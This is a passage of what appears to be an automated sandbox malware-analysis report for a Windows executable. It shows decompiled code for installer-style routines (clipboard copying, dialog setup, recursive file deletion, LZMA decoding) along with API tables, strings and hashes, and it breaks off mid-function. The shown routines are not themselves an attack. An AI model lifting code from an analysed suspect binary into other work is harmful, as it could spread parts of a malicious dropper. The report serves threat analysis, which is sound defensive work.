								_v48 = 0x4236e8;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t171 = _t171 + SendMessageW(_v8, 0x1073, _a4,  &_v68) + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						if( *0x4291cc == _t156) {
							ShowWindow( *0x42a208, 8);
							if( *0x42a2ac == _t156) {
								_t119 =  *0x4226c0; // 0x532ebc
								E004052B0( *((intOrPtr*)(_t119 + 0x34)), _t156);
							}
							E004041BA(_t171);
							goto L25;
						}
						 *0x421eb8 = 2;
						E004041BA(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00404248(_a8, _a12, _a16);
						}
						ShowWindow( *0x4291d0, _t156);
						ShowWindow(_t169, 8);
						E00404216(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x42a214;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x4291d0 = GetDlgItem(_a4, 0x403);
				 *0x4291c8 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x4291e4 = _t134;
				_v8 = _t134;
				E00404216( *0x4291d0);
				 *0x4291d4 = E00404B4D(4);
				 *0x4291ec = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004041E1(_a4);
				if(( *0x42a21c & 0x00000003) != 0) {
					ShowWindow( *0x4291d0, _t156);
					if(( *0x42a21c & 0x00000002) != 0) {
						 *0x4291d0 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E00404216( *0x4291c8);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x42a21c & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

0x004053f7
0x004053fd
0x00405407
0x0040540a
0x004055a0
0x004055bd
0x004055c4
0x004055c4
0x004055d7
0x004055f5
0x004055f7
0x004055ff
0x00405655
0x00405659
0x00000000
0x00000000
0x0040565b
0x00405661
0x00000000
0x00000000
0x0040566b
0x00405673
0x00405676
0x00405778
0x00000000
0x00405778
0x00405685
0x00405690
0x00405699
0x004056a4
0x004056a7
0x004056b0
0x004056b6
0x004056b9
0x004056b9
0x004056d1
0x004056da
0x004056dd
0x004056e4
0x004056eb
0x004056f3
0x004056f3
0x0040570a
0x0040570a
0x00405711
0x00405717
0x00405723
0x0040572a
0x00405733
0x00405735
0x00405738
0x00405747
0x0040574a
0x00405750
0x00405751
0x00405757
0x00405758
0x00405759
0x00405761
0x0040576c
0x00405772
0x00405772
0x00000000
0x004056d1
0x00405607
0x00405637
0x0040563f
0x00405641
0x0040564a
0x0040564a
0x00405650
0x00000000
0x00405650
0x0040560b
0x00405615
0x00000000
0x004055d9
0x004055df
0x0040561a
0x00000000
0x00405623
0x004055e8
0x004055ed
0x004055f0
0x00000000
0x004055f0
0x004055d7
0x00405410
0x00405414
0x0040541c
0x00405420
0x00405423
0x00405426
0x00405429
0x0040542c
0x0040542d
0x0040542e
0x00405447
0x0040544a
0x00405454
0x00405463
0x0040546b
0x00405473
0x00405478
0x0040547b
0x00405487
0x00405490
0x00405499
0x004054bb
0x004054c1
0x004054d2
0x004054d7
0x004054e5
0x004054f3
0x004054f3
0x004054f8
0x00405506
0x00405506
0x0040550b
0x0040550e
0x00405513
0x0040551f
0x00405528
0x00405535
0x00405544
0x00405537
0x0040553c
0x0040553c
0x00405550
0x00405550
0x00405564
0x0040556d
0x00405576
0x00405586
0x00405592
0x00405592
0x00000000

APIs

GetDlgItem.USER32(?,00000403), ref: 0040544D
GetDlgItem.USER32(?,000003EE), ref: 0040545C
GetClientRect.USER32(?,?), ref: 00405499
GetSystemMetrics.USER32(00000002), ref: 004054A0
SendMessageW.USER32(?,00001061,00000000,?), ref: 004054C1
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004054D2
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004054E5
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004054F3
SendMessageW.USER32(?,00001024,00000000,?), ref: 00405506
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405528
ShowWindow.USER32(?,00000008), ref: 0040553C
GetDlgItem.USER32(?,000003EC), ref: 0040555D
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040556D
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405586
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405592
GetDlgItem.USER32(?,000003F8), ref: 0040546B

Part of subcall function 00404216: SendMessageW.USER32(00000028,?,00000001,00404041), ref: 00404224

GetDlgItem.USER32(?,000003EC), ref: 004055AF
CreateThread.KERNEL32(00000000,00000000,Function_00005383,00000000), ref: 004055BD
CloseHandle.KERNELBASE(00000000), ref: 004055C4
ShowWindow.USER32(00000000), ref: 004055E8
ShowWindow.USER32(?,00000008), ref: 004055ED
ShowWindow.USER32(00000008), ref: 00405637
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040566B
CreatePopupMenu.USER32 ref: 0040567C
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405690
GetWindowRect.USER32(?,?), ref: 004056B0
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056C9
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405701
OpenClipboard.USER32(00000000), ref: 00405711
EmptyClipboard.USER32 ref: 00405717
GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405723
GlobalLock.KERNEL32(00000000), ref: 0040572D
SendMessageW.USER32(?,00001073,00000000,?), ref: 00405741
GlobalUnlock.KERNEL32(00000000), ref: 00405761
SetClipboardData.USER32(0000000D,00000000), ref: 0040576C
CloseClipboard.USER32 ref: 00405772

Strings

{, xrefs: 00405655
6B, xrefs: 004056DD

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {$6B
API String ID: 590372296-3705917127
Opcode ID: bafaae828d30907193abfb7d0b2ebba1375cd8af34f5706ff9aabcfc974c4f7c
Instruction ID: d3ec127817543c8dcb48433ae4040966c093085d210dffb8a3526856162b3191
Opcode Fuzzy Hash: bafaae828d30907193abfb7d0b2ebba1375cd8af34f5706ff9aabcfc974c4f7c
Instruction Fuzzy Hash: B1B14A70900609FFDB119FA1DD89AAE7B79FB44354F00403AFA45B61A0CB754E52DF68

Uniqueness

Uniqueness Score: -1.00%

Function 0040595A Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 148
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E0040595A(void* __eflags, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				short _v556;
				short _v558;
				struct _WIN32_FIND_DATAW _v604;
				signed int _t38;
				signed int _t52;
				signed int _t55;
				signed int _t62;
				void* _t64;
				signed char _t65;
				WCHAR* _t66;
				void* _t67;
				WCHAR* _t68;
				void* _t70;

				_t65 = _a8;
				_t68 = _a4;
				_v8 = _t65 & 0x00000004;
				_t38 = E00405C25(__eflags, _t68);
				_v12 = _t38;
				if((_t65 & 0x00000008) != 0) {
					_t62 = DeleteFileW(_t68); // executed
					asm("sbb eax, eax");
					_t64 =  ~_t62 + 1;
					 *0x42a2a8 =  *0x42a2a8 + _t64;
					return _t64;
				}
				_a4 = _t65;
				_t8 =  &_a4;
				 *_t8 = _a4 & 0x00000001;
				__eflags =  *_t8;
				if( *_t8 == 0) {
					L5:
					E0040624C(0x4256f0, _t68);
					__eflags = _a4;
					if(_a4 == 0) {
						E00405B69(_t68);
					} else {
						lstrcatW(0x4256f0, L"\\*.*");
					}
					__eflags =  *_t68;
					if( *_t68 != 0) {
						L10:
						lstrcatW(_t68, 0x40a014);
						L11:
						_t66 =  &(_t68[lstrlenW(_t68)]);
						_t38 = FindFirstFileW(0x4256f0,  &_v604); // executed
						_t70 = _t38;
						__eflags = _t70 - 0xffffffff;
						if(_t70 == 0xffffffff) {
							L26:
							__eflags = _a4;
							if(_a4 != 0) {
								_t30 = _t66 - 2;
								 *_t30 =  *(_t66 - 2) & 0x00000000;
								__eflags =  *_t30;
							}
							goto L28;
						} else {
							goto L12;
						}
						do {
							L12:
							__eflags = _v604.cFileName - 0x2e;
							if(_v604.cFileName != 0x2e) {
								L16:
								E0040624C(_t66,  &(_v604.cFileName));
								__eflags = _v604.dwFileAttributes & 0x00000010;
								if(__eflags == 0) {
									_t52 = E00405912(__eflags, _t68, _v8);
									__eflags = _t52;
									if(_t52 != 0) {
										E004052B0(0xfffffff2, _t68);
									} else {
										__eflags = _v8 - _t52;
										if(_v8 == _t52) {
											 *0x42a2a8 =  *0x42a2a8 + 1;
										} else {
											E004052B0(0xfffffff1, _t68);
											E00406012(_t67, _t68, 0);
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E0040595A(__eflags, _t68, _a8);
									}
								}
								goto L24;
							}
							__eflags = _v558;
							if(_v558 == 0) {
								goto L24;
							}
							__eflags = _v558 - 0x2e;
							if(_v558 != 0x2e) {
								goto L16;
							}
							__eflags = _v556;
							if(_v556 == 0) {
								goto L24;
							}
							goto L16;
							L24:
							_t55 = FindNextFileW(_t70,  &_v604);
							__eflags = _t55;
						} while (_t55 != 0);
						_t38 = FindClose(_t70);
						goto L26;
					}
					__eflags =  *0x4256f0 - 0x5c;
					if( *0x4256f0 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t38;
					if(_t38 == 0) {
						L28:
						__eflags = _a4;
						if(_a4 == 0) {
							L36:
							return _t38;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t38 = E0040658F(_t68);
							__eflags = _t38;
							if(_t38 == 0) {
								goto L36;
							}
							E00405B1D(_t68);
							_t38 = E00405912(__eflags, _t68, _v8 | 0x00000001);
							__eflags = _t38;
							if(_t38 != 0) {
								return E004052B0(0xffffffe5, _t68);
							}
							__eflags = _v8;
							if(_v8 == 0) {
								goto L30;
							}
							E004052B0(0xfffffff1, _t68);
							return E00406012(_t67, _t68, 0);
						}
						L30:
						 *0x42a2a8 =  *0x42a2a8 + 1;
						return _t38;
					}
					__eflags = _t65 & 0x00000002;
					if((_t65 & 0x00000002) == 0) {
						goto L28;
					}
					goto L5;
				}
			}

0x00405964
0x00405969
0x00405972
0x00405975
0x0040597d
0x00405980
0x00405983
0x0040598b
0x0040598d
0x0040598e
0x00000000
0x0040598e
0x00405999
0x0040599c
0x0040599c
0x0040599c
0x004059a0
0x004059b3
0x004059ba
0x004059bf
0x004059c3
0x004059d3
0x004059c5
0x004059cb
0x004059cb
0x004059d8
0x004059dc
0x004059e8
0x004059ee
0x004059f3
0x004059f9
0x00405a04
0x00405a0a
0x00405a0c
0x00405a0f
0x00405ab9
0x00405ab9
0x00405abd
0x00405abf
0x00405abf
0x00405abf
0x00405abf
0x00000000
0x00000000
0x00000000
0x00000000
0x00405a15
0x00405a15
0x00405a15
0x00405a1d
0x00405a3d
0x00405a45
0x00405a4a
0x00405a51
0x00405a6c
0x00405a71
0x00405a73
0x00405a97
0x00405a75
0x00405a75
0x00405a78
0x00405a8c
0x00405a7a
0x00405a7d
0x00405a85
0x00405a85
0x00405a78
0x00405a53
0x00405a59
0x00405a5b
0x00405a61
0x00405a61
0x00405a5b
0x00000000
0x00405a51
0x00405a1f
0x00405a27
0x00000000
0x00000000
0x00405a29
0x00405a31
0x00000000
0x00000000
0x00405a33
0x00405a3b
0x00000000
0x00000000
0x00000000
0x00405a9c
0x00405aa4
0x00405aaa
0x00405aaa
0x00405ab3
0x00000000
0x00405ab3
0x004059de
0x004059e6
0x00000000
0x00000000
0x00000000
0x004059a2
0x004059a2
0x004059a4
0x00405ac4
0x00405ac6
0x00405ac9
0x00405b1a
0x00405b1a
0x00405b1a
0x00405acb
0x00405ace
0x00405ad9
0x00405ade
0x00405ae0
0x00000000
0x00000000
0x00405ae3
0x00405aef
0x00405af4
0x00405af6
0x00000000
0x00405b11
0x00405af8
0x00405afb
0x00000000
0x00000000
0x00405b00
0x00000000
0x00405b07
0x00405ad0
0x00405ad0
0x00000000
0x00405ad0
0x004059aa
0x004059ad
0x00000000
0x00000000
0x00000000
0x004059ad

APIs

DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,75333420,00000000), ref: 00405983
lstrcatW.KERNEL32(Unthinkingly\lagerbeholdnings\Bureauchef\Smaaskndt.Cri,\*.*), ref: 004059CB
lstrcatW.KERNEL32(?,0040A014), ref: 004059EE
lstrlenW.KERNEL32(?,?,0040A014,?,Unthinkingly\lagerbeholdnings\Bureauchef\Smaaskndt.Cri,?,?,C:\Users\user\AppData\Local\Temp\,75333420,00000000), ref: 004059F4
FindFirstFileW.KERNELBASE(Unthinkingly\lagerbeholdnings\Bureauchef\Smaaskndt.Cri,?,?,?,0040A014,?,Unthinkingly\lagerbeholdnings\Bureauchef\Smaaskndt.Cri,?,?,C:\Users\user\AppData\Local\Temp\,75333420,00000000), ref: 00405A04
FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405AA4
FindClose.KERNEL32(00000000), ref: 00405AB3

Strings

\*.*, xrefs: 004059C5
C:\Users\user\AppData\Local\Temp\, xrefs: 00405968
"C:\Users\user\Desktop\64Tgzu2FKh.exe", xrefs: 0040595A
Unthinkingly\lagerbeholdnings\Bureauchef\Smaaskndt.Cri, xrefs: 004059B3, 004059B9, 004059CA, 00405A03

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\64Tgzu2FKh.exe"$C:\Users\user\AppData\Local\Temp\$Unthinkingly\lagerbeholdnings\Bureauchef\Smaaskndt.Cri$\*.*
API String ID: 2035342205-1499999342
Opcode ID: cef271d36a4cb6b758dae5d81120ae6a1160f274867ba4d7352c158524ee07bb
Instruction ID: a8a76f5088e9b8e84a0c744efebc89a786f36fdc765849bba2b15b9d7042df22
Opcode Fuzzy Hash: cef271d36a4cb6b758dae5d81120ae6a1160f274867ba4d7352c158524ee07bb
Instruction Fuzzy Hash: BA41E230A01A14AACB21BB658C89ABF7778EF81764F50427FF801711D1D77C5982DEAE

Uniqueness

Uniqueness Score: -1.00%

Function 0040658F Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 14
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040658F(WCHAR* _a4) {
				void* _t2;

				_t2 = FindFirstFileW(_a4, 0x426738); // executed
				if(_t2 == 0xffffffff) {
					return 0;
				}
				FindClose(_t2);
				return 0x426738;
			}

0x0040659a
0x004065a3
0x00000000
0x004065b0
0x004065a6
0x00000000

APIs

FindFirstFileW.KERNELBASE(?,00426738,C:\Users\user\AppData\Local\Temp\nseEF5D.tmp,00405C6E,C:\Users\user\AppData\Local\Temp\nseEF5D.tmp,C:\Users\user\AppData\Local\Temp\nseEF5D.tmp,00000000,C:\Users\user\AppData\Local\Temp\nseEF5D.tmp,C:\Users\user\AppData\Local\Temp\nseEF5D.tmp,?,?,75333420,0040597A,?,C:\Users\user\AppData\Local\Temp\,75333420), ref: 0040659A
FindClose.KERNEL32(00000000), ref: 004065A6

Strings

8gB, xrefs: 00406590
C:\Users\user\AppData\Local\Temp\nseEF5D.tmp, xrefs: 0040658F

Memory Dump Source

Source File: 00000000.00000002.1533003275.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1532965021.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533082541.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533122155.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000460000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.0000000000469000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1533565833.000000000046F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_64Tgzu2FKh.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID: 8gB$C:\Users\user\AppData\Local\Temp\nseEF5D.tmp
API String ID: 2295610775-2470628108
Opcode ID: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
Instruction ID: 94cc43f68e1cdd1d7b1eae1ec77a84073341a0d38183f0b632eac2f66d480838
Opcode Fuzzy Hash: 10d21b2891892a60ec94b320bc5d87934ec883ac9a5b90ef038b3d3a92de116a
Instruction Fuzzy Hash: 5DD01231509020ABC20157387D0C85BBA5C9F55331B129A37B466F52E4D7348C6286AC

Uniqueness

Uniqueness Score: -1.00%

Function 00406956 Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Download Yara Rule

C-Code - Quality: 98%

			E00406956() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
